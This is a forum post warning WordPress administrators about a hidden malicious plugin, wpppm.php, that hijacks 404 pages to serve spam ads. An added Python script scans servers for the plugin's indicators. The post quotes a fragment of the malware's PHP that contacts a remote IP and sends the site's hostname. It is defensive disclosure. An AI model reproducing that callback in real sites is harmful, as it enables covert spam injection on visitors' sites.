SoCal WordPress Users' Group Message Board › Watch out for malicious "plugin" wpppm
I just tracked this down in a client's site.
While no plugin shows in the admin dashboard, in the plugin dir there's a wpppm/wpppm.php file (and a related subdir filled with files with random hash filenames). The way it works is it overrides the normal 404 behavior of your site and serves up a spam ad page for any URL that isn't otherwise a valid page, like yoursite.com/sdlfkjsldfkjsdflkjsdfs
The file starts with:
Plugin Name: Wordpress Plugin Manager
$u = "http://... 18.104.22.168/v.html?v=$ver&h=" . urlencode($_SERVER['HTTP_HOST']);
(I "broke" the URL above so it wouldn't be a valid link)
So most people would think it's a standard WP file, but notice the name of the function: fourofour = 404
If you enter that URL into your browser you get (at least I did) 22.214.171.124
and if you enter that into your browser you get the "HYDROXYCITRIC" spam page that will be injected into your site.
You might want to block those addresses in your firewall and search your servers for this wpppm.php.
After the fact, I found this article on it: http://blog.sucuri.ne...
Interestingly, if you Google wpppm.php you'll find about 6,500 sites infected by this!
todd at toddzebert dot com
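Added example, not part of the original post and not the poster's code: one way to run the server search suggested above, using only the indicators the post names (the wpppm.php filename, the "Wordpress Plugin Manager" header, the fourofour function name, and a sibling subdirectory of hash-named files). The hex-filename pattern and the 0.8 threshold are assumptions about what "random hash filenames" looks like on disk.

```python
import os
import re
import sys

# Indicators quoted in the post above.
DROPPER_NAME = "wpppm.php"
MARKERS = (b"Plugin Name: Wordpress Plugin Manager", b"fourofour")
# Assumption: "random hash filenames" means long hex strings (MD5/SHA-1 style).
HASH_NAME = re.compile(r"^[0-9a-f]{16,64}(\.\w+)?$", re.I)


def hashlike_ratio(directory):
    """Fraction of regular files in `directory` whose names look like hashes."""
    try:
        names = [e.name for e in os.scandir(directory) if e.is_file(follow_symlinks=False)]
    except OSError:
        return 0.0
    return sum(bool(HASH_NAME.match(n)) for n in names) / len(names) if names else 0.0


def scan(root):
    """Walk `root` and return (path, reasons) for every PHP file matching an indicator."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = ["filename wpppm.php"] if name.lower() == DROPPER_NAME else []
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536)  # the header and hook sit near the top
            except OSError:
                head = b""  # unreadable: keep any filename match, skip content checks
            reasons += ["contains %r" % m.decode() for m in MARKERS if m in head]
            if not reasons:
                continue
            # Supporting evidence: a sibling subdirectory stuffed with hash-named files.
            for sub in dirnames:
                if hashlike_ratio(os.path.join(dirpath, sub)) >= 0.8:  # assumed threshold
                    reasons.append("hash-named files in %s/" % sub)
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, "<-", "; ".join(reasons))
```

Run it against the web root or the whole filesystem rather than relying on the admin dashboard, since the post notes the plugin does not show up there. A hit on "fourofour" alone is worth a manual look but is weaker than the filename or header match.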